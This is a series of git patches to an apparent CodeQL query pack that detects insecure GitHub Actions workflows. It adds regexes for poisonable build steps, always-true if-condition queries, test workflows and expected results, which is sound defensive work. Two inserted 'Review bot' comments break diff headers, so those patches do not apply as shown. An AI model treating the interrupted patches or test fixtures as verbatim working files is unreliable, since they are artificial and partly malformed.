@@ -0,0 +1,70 @@ +# For most projects, this workflow file will not need changing; you simply need +# to commit it to your repository. +# +# You may wish to alter this file to override the set of languages analyzed, +# or to provide custom queries or build logic. +# +# ******** NOTE ******** +# We have attempted to detect the languages in your repository. Please check +# the `language` matrix defined below to confirm you have the correct set of +# supported CodeQL languages. +# +name: 'CodeQL' + +on: + push: + branches: [main] + pull_request: + # The branches below must be a subset of the branches above + branches: [main] + schedule: + - cron: '16 2 * * 5' + +jobs: + analyze: + name: Analyze + runs-on: ubuntu-latest + permissions: + actions: read + contents: read + security-events: write + + strategy: + fail-fast: false + matrix: + language: ['javascript'] + # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ] + # Learn more about CodeQL language support at https://git.io/codeql-language-support + + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + # Initializes the CodeQL tools for scanning. + - name: Initialize CodeQL + uses: github/codeql-action/init@v3 + with: + languages: ${{ matrix.language }} + # If you wish to specify custom queries, you can do so here or in a config file. + # By default, queries listed here will override any specified in a config file. + # Prefix the list here with "+" to use these queries and those in the config file. + # queries: ./path/to/local/query, your-org/your-repo/queries@main + + # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). + # If this step fails, then you should remove it and run the build manually (see below) + - name: Autobuild + uses: github/codeql-action/autobuild@v3 + + # â„¹ï¸ Command-line programs to run using the OS shell. 
+ # 📚 https://git.io/JvXDl + + # âœï¸ If the Autobuild fails above, remove it and uncomment the following three lines + # and modify them (or add more) to build your code if your project + # uses a compiled language + + #- run: | + # make bootstrap + # make release + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v3 diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml new file mode 100644 index 000000000000..e736d567773b --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/.github/workflows/should_be_using_advanced_setup.yml @@ -0,0 +1,41 @@ +name: 'CodeQL' + +on: + push: + branches: ['master'] + pull_request: + branches: ['master'] + +permissions: + actions: read + contents: read + packages: read + security-events: write + +jobs: + analyze: + name: Analyze + runs-on: ${{ matrix.os }} + strategy: + fail-fast: false + matrix: + include: + - language: javascript + os: ubuntu-22.04 + - language: ruby + os: ubuntu-22.04-16core + + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Initialize CodeQL + uses: github/codeql-action/init@v3 + with: + languages: ${{ matrix.language }} + config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml + + - name: Perform CodeQL Analysis + uses: github/codeql-action/analyze@v3 + with: + category: codeql/${{ matrix.language }}/full diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual new file mode 100644 index 000000000000..3c8904a86af1 --- /dev/null +++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.actual 
@@ -0,0 +1 @@
+| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. |
diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected
new file mode 100644
index 000000000000..3c8904a86af1
--- /dev/null
+++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.expected
@@ -0,0 +1 @@
+| .github/workflows/defaultable_workflow.yml:44:9:55:6 | Uses Step | CodeQL Action could use default setup instead of advanced configuration. |
diff --git a/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref
new file mode 100644
index 000000000000..75a8fe2398a6
--- /dev/null
+++ b/ql/test/query-tests/Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.qlref
@@ -0,0 +1 @@
+Violations Of Best Practice/CodeQL/UnnecessaryUseOfAdvancedConfig.ql
\ No newline at end of file
From ea20e9b33702be6a499b992c5f534e425d4cfcf8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Sun, 3 Nov 2024 22:29:20 +0100
Subject: [PATCH 660/707] fix: Add versioned python binaries to poisonable steps
---
ql/lib/ext/config/poisonable_steps.yml | 6 +++---
.../Security/CWE-829/.github/workflows/test4.yml | 1 +
.../Security/CWE-829/.github/workflows/test7.yml | 1 +
.../Security/CWE-829/UntrustedCheckoutCritical.expected | 9 ++++++---
4 files changed, 11 insertions(+), 6 deletions(-)
diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml
index e32bc48a9832..2f03b94b4027 100644
--- a/ql/lib/ext/config/poisonable_steps.yml
+++ b/ql/lib/ext/config/poisonable_steps.yml
@@ -47,8 +47,8 @@ extensions:
- ["poetry"]
- ["pylint"]
- ["pytest"]
- - ["python\\s+-m\\s+pip\\s+install\\s+-r"]
- - ["python\\s+-m\\s+pip\\s+install\\s+--requirement"]
+ - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+-r"]
+ - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+--requirement"]
- ["rake"]
- ["rails\\s+db:create"]
- ["rails\\s+assets:precompile"]
@@ -69,7 +69,7 @@ extensions:
- ["(\\.\\s+[^\\s]+)\\b", 1] # eg: . venv/bin/activate
- ["(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b", 2]
- ["(node)\\s+([^\\s]+)(\\.js|\\.ts)\\b", 2]
- - ["(python)\\s+([^\\s]+)\\.py\\b", 2]
+ - ["(python[\\d\\.]*)\\s+([^\\s]+)\\.py\\b", 2]
- ["(ruby)\\s+([^\\s]+)\\.rb\\b", 2]
- ["(go)\\s+(generate|run)\\s+([^\\s]+)\\.go\\b", 3]
- ["(dotnet)\\s+([^\\s]+)\\.csproj\\b", 2]
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml
index a07f2922fd7a..f82f493cd6e0 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml
@@ -44,3 +44,4 @@ jobs:
uses: actions/upload-pages-artifact@v1
with:
path: './workspaces/www/build'
+ - run: python2.7 foo.py
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
index 44f5602ee061..7466cb4435d3 100644
--- a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
+++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
@@ -56,3 +56,4 @@ jobs:
echo "$processed" >> $GITHUB_OUTPUT
echo "BENCHEOF" >> $GITHUB_OUTPUT
shell: bash
+ - run: python2.7 foo.py
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index 85c2529c54c3..ec3841c23840 100644
--- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
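Review bot: The versioned suffix is only applied to the `python` entries, so sibling entries in the same list that name the interpreter or pip binary directly (a plain `pip` entry would sit alphabetically above line 47, outside this hunk, if one exists) still miss `pip3`/`pip3.12` spellings, and the `py` launcher form (`py -3 -m pip install -r`) is not matched at all. Applying the same `[\\d\\.]*` class to those entries keeps the rule consistent with this change, e.g. (constructed) `- ["pip[\\d\\.]*\\s+install\\s+-r"]`; the class also accepts a trailing dot (`python.`), which is harmless but could be tightened to `(\\d[\\d\\.]*)?` if the list's other patterns are kept strict. In the second hunk the new class is placed inside group 1, so the `2` capture index for the script path remains valid.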
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -189,7 +189,8 @@ edges | .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | | .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:47:4 | Uses Step | +| .github/workflows/test4.yml:43:7:47:4 | Uses Step | .github/workflows/test4.yml:47:7:47:28 | Run Step | | .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | | .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | 
@@ -202,7 +203,8 @@ edges | .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:59:30 | Run Step | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | 
@@ -342,7 +344,8 @@ edges | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:59:9:59:30 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:59:30 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test10.yml:25:9:30:2 | Run Step | 
.github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | From 80f2b24eebe308d7042405ac3b18478097aa69f6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 3 Nov 2024 22:29:50 +0100 Subject: [PATCH 661/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d087f03b1526..d34dad6665c8 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.83 +version: 0.1.84 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 073ddf5b4577..007c2ebbe95d 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.83 +version: 0.1.84 groups: [actions, queries] suites: codeql-suites extractor: javascript From db6f174b79161f1197d95d94864b6f323f20a7de Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 10:10:47 +0100 Subject: [PATCH 662/707] query: split if expression is always true query critical - if the if statement contains a known control check high - otherwise --- ...e.md => ExpressionIsAlwaysTrueCritical.md} | 0 ...e.ql => ExpressionIsAlwaysTrueCritical.ql} | 17 ++- .../CWE-571/ExpressionIsAlwaysTrueHigh.md | 63 ++++++++++ .../CWE-571/ExpressionIsAlwaysTrueHigh.ql | 29 +++++ .../.github/workflows/{test.yml => test1.yml} | 2 +- .../CWE-571/.github/workflows/test2.yml | 111 ++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.expected | 11 -- .../CWE-571/ExpressionIsAlwaysTrue.qlref | 1 - .../ExpressionIsAlwaysTrueCritical.expected | 11 ++ .../ExpressionIsAlwaysTrueCritical.qlref | 1 + .../ExpressionIsAlwaysTrueHigh.expected | 11 ++ .../CWE-571/ExpressionIsAlwaysTrueHigh.qlref | 1 + 12 files changed, 236 insertions(+), 22 deletions(-) rename ql/src/Security/CWE-571/{ExpressionIsAlwaysTrue.md => ExpressionIsAlwaysTrueCritical.md} (100%) rename ql/src/Security/CWE-571/{ExpressionIsAlwaysTrue.ql => ExpressionIsAlwaysTrueCritical.ql} (51%) create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql rename ql/test/query-tests/Security/CWE-571/.github/workflows/{test.yml => test1.yml} (97%) create mode 100644 ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml delete mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected delete mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref 
diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md similarity index 100% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md rename to ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql similarity index 51% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql rename to ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql index 58eab4c60222..6eaaca6e05db 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql @@ -1,27 +1,26 @@ /** - *: - * * @name If expression always true * @description Expressions used in If conditions with extra spaces are always true. * @kind problem * @security-severity 9.0 * @problem.severity error - * @precision high - * @id actions/if-expression-always-true + * @precision very-high + * @id actions/if-expression-always-true/critical * @tags actions * maintainability * external/cwe/cwe-275 */ import actions +import codeql.actions.security.ControlChecks -from If i +from ControlCheck i where - i.getCondition().matches("%${{%") and + i.(If).getCondition().matches("%${{%") and ( - not i.getCondition().matches("${{%") or - not i.getCondition().matches("%}}") + not i.(If).getCondition().matches("${{%") or + not i.(If).getCondition().matches("%}}") ) or - count(i.getCondition().splitAt("${{")) > 2 + count(i.(If).getCondition().splitAt("${{")) > 2 select i, "Expression always evaluates to true" diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md new file mode 100644 index 000000000000..1e7ea120cbaa --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md 
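Review bot: Both new queries keep the identical `@name If expression always true` while their ids differ (`actions/if-expression-always-true/critical` here, `/high` in the `ExpressionIsAlwaysTrueHigh.ql` hunk), so the two alert kinds cannot be told apart by name in query lists or the code-scanning UI; a suffix such as `@name If expression always true (control check)` for this query would separate them. Both also tag `external/cwe/cwe-275` although they live under `CWE-571` and describe an always-true condition, which is CWE-571 rather than CWE-275 (Permission Issues); `external/cwe/cwe-571` matches the directory. Finally, the `where` clause here relies on `and` binding tighter than `or`, whereas the High query parenthesizes the same disjunction explicitly; wrapping it the same way keeps the two queries readable side by side.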
@@ -0,0 +1,63 @@ +# If Condition Always Evaluates to True + +## Description + +GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`. + +When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences. + +## Recommendation + +To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: + +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. +2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. +3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. + +## Examples + +### Correct Usage + +1. Omit `${{` and `}}` in `if` conditions: + + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` + +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +### Incorrect Usage + +1. Do not mix Workflow Expressions with un-delimited expressions: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` + +2. 
Do not include trailing new lines or spaces: + + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +## References + +- [Expression Always True Github Issue](https://github.com/actions/runner/issues/1173) diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql new file mode 100644 index 000000000000..6b0c69977612 --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql @@ -0,0 +1,29 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/if-expression-always-true/high + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions +import codeql.actions.security.ControlChecks + +from If i +where + not i instanceof ControlCheck and + ( + i.getCondition().matches("%${{%") and + ( + not i.getCondition().matches("${{%") or + not i.getCondition().matches("%}}") + ) + or + count(i.getCondition().splitAt("${{")) > 2 + ) +select i, "Expression always evaluates to true" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml similarity index 97% rename from ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml rename to ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml index 4ed45ff973e7..bbbcc5aaa791 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml 
@@ -91,7 +91,7 @@ jobs: if: ${{ github.event_name }} == 'foo' run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' run: echo "Test 19 should not be printed" - name: Test 20 if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml new file mode 100644 index 000000000000..8b863037e29b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml 
@@ -0,0 +1,111 @@ +name: Event + +on: + workflow_dispatch: + +jobs: + if-tests: + runs-on: ubuntu-latest + permissions: {} + steps: + - name: Test 1 + if: github.actor == "foo" + run: echo "Test 1 should not be printed" + - name: Test 2 + if: | + ${{ + github.actor == "foo" || + 3 == 4 + }} + run: echo "Test 2 should not be printed" + - name: Test 3 + if: ${{ github.actor == "foo" }} + run: echo "Test 3 should not be printed" + - name: Test 4 + if: ${{ github.actor == "foo" }} + run: echo "Test 4 should not be printed" + - name: Test 5 + if: ${{ + github.actor == "foo" || + 3 == 4 + }} + run: echo "Test 5 should not be printed" + - name: Test 6 + if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} + run: echo "Test 6 should not be printed" + - name: Test 7 + run: echo "Test 7 should not be printed" + if: ${{ + github.actor == "foo" || + 3 == 4 + }} + + - name: Test 8 + run: echo "Test 8 should not be printed" + if: > + ${{ + github.actor == "foo" || + 3 == 4 }} + - name: Test 9 + if: '${{ github.actor == "foo" }}' + run: echo "Test 9 should not be printed" + - name: Test 10 + if: "${{ github.actor == 111 }}" + run: echo "Test 10 should not be printed" + - name: Test 11 + if: " ${{ github.actor == 111 }}" + run: echo "Test 11 should not be printed" + - name: Test 12 + if: " ${{ github.actor == 111 }}" + run: echo "Test 12 should not be printed" + - name: Test 13 + if: | + github.actor == "foo" || + 3 == 4 + run: echo "Test 13 should not be printed" + - name: Test 14 + if: >- + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 14 should not be printed" + - name: Test 15 + if: |- + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 15 should not be printed" + - name: Test 16 + if: |+ + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 16 should not be printed" + - name: Test 17 + if: >+ + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 17 should not be printed" + - name: Test 18 + if: ${{ github.actor }} == 'foo' + run: echo 
"Test 18 should not be printed" + - name: Test 19 + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + run: echo "Test 19 should not be printed" + - name: Test 20 + if: ${{ github.actor }} != "" + run: echo "Test 20 should not be printed" + - name: Test 21 + if: > + ${{ github.actor == 'foo' && + github.event.workflow_run.conclusion == 'success' }} + run: echo "Test 21 should not be printed" + - name: Test 22 + if: | + runner.os == 'Windows' && ( + startsWith(inputs.node, 'v10.') || + startsWith(inputs.node, 'v12.') || + startsWith(inputs.node, 'v14.') + ) + run: echo "Test 22 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected deleted file mode 100644 index d4c16131cc26..000000000000 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected +++ /dev/null 
@@ -1,11 +0,0 @@ -| .github/workflows/test.yml:15:13:19:13 | \| | Expression always evaluates to true | -| .github/workflows/test.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | -| .github/workflows/test.yml:45:13:48:24 | > | Expression always evaluates to true | -| .github/workflows/test.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | -| .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | -| .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true | -| .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true | -| .github/workflows/test.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | -| .github/workflows/test.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | -| .github/workflows/test.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | -| .github/workflows/test.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref deleted file mode 100644 index 01235fb6a202..000000000000 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-571/ExpressionIsAlwaysTrue.ql diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected new file mode 100644 index 000000000000..2ef457d9e01a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected 
@@ -0,0 +1,11 @@ +| .github/workflows/test2.yml:15:13:19:13 | \| | Expression always evaluates to true | +| .github/workflows/test2.yml:34:13:34:54 | ${{ 1 = ... foo" }} | Expression always evaluates to true | +| .github/workflows/test2.yml:45:13:48:24 | > | Expression always evaluates to true | +| .github/workflows/test2.yml:56:15:56:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:59:15:59:44 | " ${{ g ... 11 }}" | Expression always evaluates to true | +| .github/workflows/test2.yml:79:13:82:14 | \|+ | Expression always evaluates to true | +| .github/workflows/test2.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test2.yml:91:13:91:40 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test2.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | +| .github/workflows/test2.yml:97:13:97:37 | ${{ git ... } != "" | Expression always evaluates to true | +| .github/workflows/test2.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref new file mode 100644 index 000000000000..823f802a70f2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref @@ -0,0 +1 @@ +Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected new file mode 100644 index 000000000000..c853603377cf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected 
